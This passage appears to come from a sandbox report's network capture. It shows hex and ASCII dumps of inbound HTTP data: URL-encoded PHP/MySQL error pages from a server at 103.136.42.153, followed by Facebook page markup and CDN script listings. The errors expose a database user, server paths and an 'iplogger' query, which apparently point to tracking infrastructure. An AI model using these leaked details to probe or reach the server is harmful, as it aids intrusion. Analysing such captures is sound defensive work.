2022-10-07 13:59:18 UTC	510	IN	Data Raw: 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 30 30 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 Data Ascii: u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523000000\u002522\u00253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost&#0
2022-10-07 13:59:18 UTC	511	IN	Data Raw: 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 Data Ascii: 3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20
2022-10-07 13:59:18 UTC	513	IN	Data Raw: 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c Data Ascii: \u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\
2022-10-07 13:59:18 UTC	514	IN	Data Raw: 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 66 66 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 35 42 54 45 50 5c 75 30 30 32 35 32 30 53 54 4f 50 5c 75 30 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f Data Ascii: 3E\u00250A\u00253Cfont\u002520color=\u002522\u002523ff0000\u002522\u00253E\u00255BTEP\u002520STOP\u00255D\u00253C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/
2022-10-07 13:59:18 UTC	516	IN	Data Raw: 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 Data Ascii: logger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b
2022-10-07 13:59:18 UTC	517	IN	Data Raw: 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e Data Ascii: 53Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/in
2022-10-07 13:59:18 UTC	519	IN	Data Raw: 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 Data Ascii: %20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access
2022-10-07 13:59:18 UTC	520	IN	Data Raw: 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c Data Ascii: 20is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\
2022-10-07 13:59:18 UTC	522	IN	Data Raw: 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 Data Ascii: 'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc0
2022-10-07 13:59:18 UTC	523	IN	Data Raw: 6f 63 61 6c 68 6f 73 74 25 32 37 25 32 35 32 30 25 32 38 75 73 69 6e 67 25 32 35 32 30 70 61 73 73 77 6f 72 64 25 33 41 25 32 35 32 30 59 45 53 25 32 39 25 32 35 32 30 69 6e 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 25 32 46 77 77 77 25 32 46 77 77 77 72 6f 6f 74 25 32 46 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 25 32 46 73 65 65 6d 6f 72 65 62 74 79 25 32 46 69 6e 63 6c 75 64 65 73 25 32 46 64 61 74 61 62 61 73 65 2e 70 68 70 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 32 30 6f 6e 25 32 35 32 30 6c 69 6e 65 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 34 37 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 Data Ascii: ocalhost%27%2520%28using%2520password%3A%2520YES%29%2520in%2520%253Cb%253E%2Fwww%2Fwwwroot%2F103.136.42.153%2Fseemorebty%2Fincludes%2Fdatabase.php%253C%2Fb%253E%2520on%2520line%2520%253Cb%253E47%253C%2Fb%253E%250A%253Cbr%2520%2F%253E%250A%253Cbr%2520%2F%2
2022-10-07 13:59:18 UTC	525	IN	Data Raw: 3d 22 2f 72 65 67 2f 22 20 74 69 74 6c 65 3d 22 53 69 67 6e 20 55 70 20 66 6f 72 20 46 61 63 65 62 6f 6f 6b 22 3e 53 69 67 6e 20 55 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 2f 22 20 74 69 74 6c 65 3d 22 4c 6f 67 20 69 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 22 3e 4c 6f 67 20 49 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 4d 65 73 73 65 6e 67 65 72 2e 22 3e 4d 65 73 73 65 6e 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 69 74 65 2f 22 20 74 69 74 6c 65 3d 22 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 20 66 6f 72 20 41 6e 64 72 6f 69 64 2e Data Ascii: ="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.
2022-10-07 13:59:18 UTC	526	IN	Data Raw: 22 2f 66 75 6e 64 72 61 69 73 65 72 73 2f 22 20 74 69 74 6c 65 3d 22 44 6f 6e 61 74 65 20 74 6f 20 77 6f 72 74 68 79 20 63 61 75 73 65 73 2e 22 3e 46 75 6e 64 72 61 69 73 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 62 69 7a 2f 64 69 72 65 63 74 6f 72 79 2f 22 20 74 69 74 6c 65 3d 22 42 72 6f 77 73 65 20 6f 75 72 20 46 61 63 65 62 6f 6f 6b 20 53 65 72 76 69 63 65 73 20 64 69 72 65 63 74 6f 72 79 2e 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 76 6f 74 69 6e 67 69 6e 66 6f 72 6d 61 74 69 6f 6e 63 65 6e 74 65 72 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 63 32 6c 30 5a 51 25 33 44 25 33 44 22 20 74 69 74 6c 65 3d 22 53 65 65 20 74 68 65 20 56 6f 74 69 6e 67 20 49 6e 66 6f Data Ascii: "/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Info
2022-10-07 13:59:18 UTC	527	IN	Data Raw: 20 61 63 63 65 73 73 6b 65 79 3d 22 39 22 20 74 69 74 6c 65 3d 22 52 65 76 69 65 77 20 6f 75 72 20 74 65 72 6d 73 20 61 6e 64 20 70 6f 6c 69 63 69 65 73 2e 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 68 65 6c 70 2f 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 30 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 48 65 6c 70 20 43 65 6e 74 65 72 2e 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 65 6c 70 2f 36 33 37 32 30 35 30 32 30 38 37 38 35 30 34 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 43 6f 6e 74 61 63 74 20 55 70 6c 6f 61 64 69 6e 67 20 26 61 6d 70 3b 20 4e 6f 6e 2d 55 73 65 72 73 20 4e 6f 74 69 63 65 2e 22 3e 43 6f 6e 74 61 63 Data Ascii: accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Contact Uploading & Non-Users Notice.">Contac
2022-10-07 13:59:18 UTC	529	IN	Data Raw: 6f 66 70 63 53 70 37 43 41 7a 4d 64 5a 79 63 22 7d 2c 22 37 32 39 36 33 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 62 30 74 6a 38 41 48 57 47 35 6c 54 46 31 61 67 22 7d 2c 22 31 32 38 31 35 30 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 50 48 5a 4d 39 67 46 6f 79 70 43 6a 51 62 55 77 22 7d 2c 22 31 32 39 31 30 32 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 31 39 4c 73 65 49 47 31 6e 77 71 33 6f 46 6e 41 22 7d 2c 22 31 32 39 34 31 38 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 76 64 36 6d 77 72 74 41 4a 6f 75 45 4a 4f 49 41 22 7d 2c 22 31 33 39 39 32 31 38 22 3a 7b 22 72 65 Data Ascii: ofpcSp7CAzMdZyc"},"729631":{"result":false,"hash":"AT7b0tj8AHWG5lTF1ag"},"1281505":{"result":false,"hash":"AT4PHZM9gFoypCjQbUw"},"1291023":{"result":false,"hash":"AT519LseIG1nwq3oFnA"},"1294182":{"result":false,"hash":"AT4vd6mwrtAJouEJOIA"},"1399218":{"re
2022-10-07 13:59:18 UTC	530	IN	Data Raw: 33 34 65 31 0d 0a 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 47 73 48 39 4b 62 2d 33 57 2d 74 61 5a 69 66 6b 22 7d 2c 22 31 39 30 36 38 37 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 64 49 42 69 56 76 39 62 55 44 58 6c 6d 36 5f 55 22 7d 2c 22 31 39 38 35 39 34 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 4d 56 6f 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 30 56 2d 51 5f 7a 66 45 79 6b 7a 6e 4f 46 4a 30 22 7d 2c 22 31 30 39 39 38 39 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 Data Ascii: 34e19":{"result":false,"hash":"AT5GsH9Kb-3W-taZifk"},"1906871":{"result":false,"hash":"AT6dIBiVv9bUDXlm6_U"},"1985945":{"result":true,"hash":"AT66Oo5lY__5wUTpMVo"},"5541":{"result":true,"hash":"AT70V-Q_zfEykznOFJ0"},"1099893":{"result":false,"hash":"AT5
2022-10-07 13:59:18 UTC	531	IN	Data Raw: 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4e 5c 2f 72 5c 2f 4d 5a 6b 59 36 6e 4c 4a 77 36 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 50 4c 48 38 6a 67 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 44 5c 2f 72 5c 2f 39 73 69 5f 62 6c 67 53 6a 38 6b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 70 51 5c 2f 69 66 58 75 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 Data Ascii: xx.fbcdn.net\/rsrc.php\/v3\/yN\/r\/MZkY6nLJw6Q.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"RPLH8jg":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yD\/r\/9si_blgSj8k.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"pQ\/ifXu":{"type":"js","src":"https:\/\/static.xx.fbc
2022-10-07 13:59:18 UTC	533	IN	Data Raw: 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 72 5c 2f 6a 6d 78 55 56 58 66 68 50 38 70 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 43 51 57 57 67 50 76 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 68 49 4f 58 68 45 30 67 38 4b 64 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 73 72 50 6d 64 74 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 Data Ascii: https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/r\/jmxUVXfhP8p.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"CQWWgPv":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/l\/0,cross\/hIOXhE0g8Kd.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"srPmdt4":{"type":"js","sr
2022-10-07 13:59:18 UTC	534	IN	Data Raw: 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 71 31 6a 53 5a 38 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6a 5c 2f 72 5c 2f 32 55 78 6e 37 5a 36 64 75 45 63 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 44 39 58 42 33 67 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 73 6a 37 34 5c 2f 79 46 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 66 77 55 70 77 58 36 79 6b 48 78 2e 6a 73 3f 5f 6e 63 5f 78 Data Ascii: p8lg5Kz","nc":1},"q1jSZ8c":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yj\/r\/2Uxn7Z6duEc.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"D9XB3gj":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3isj74\/yF\/l\/en_US\/fwUpwX6ykHx.js?_nc_x
2022-10-07 13:59:18 UTC	536	IN	Data Raw: 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5f 5c 2f 72 5c 2f 57 6b 32 5a 31 42 76 34 57 79 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 7a 50 4c 67 49 47 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6e 5c 2f 72 5c 2f 6d 6f 44 52 41 50 58 48 55 61 32 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 58 55 68 43 47 44 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 Data Ascii: xx.fbcdn.net\/rsrc.php\/v3\/y_\/r\/Wk2Z1Bv4Wyo.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"zPLgIGT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yn\/r\/moDRAPXHUa2.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"RXUhCGD":{"type":"css","src":"https:\/\/static.xx.fbc
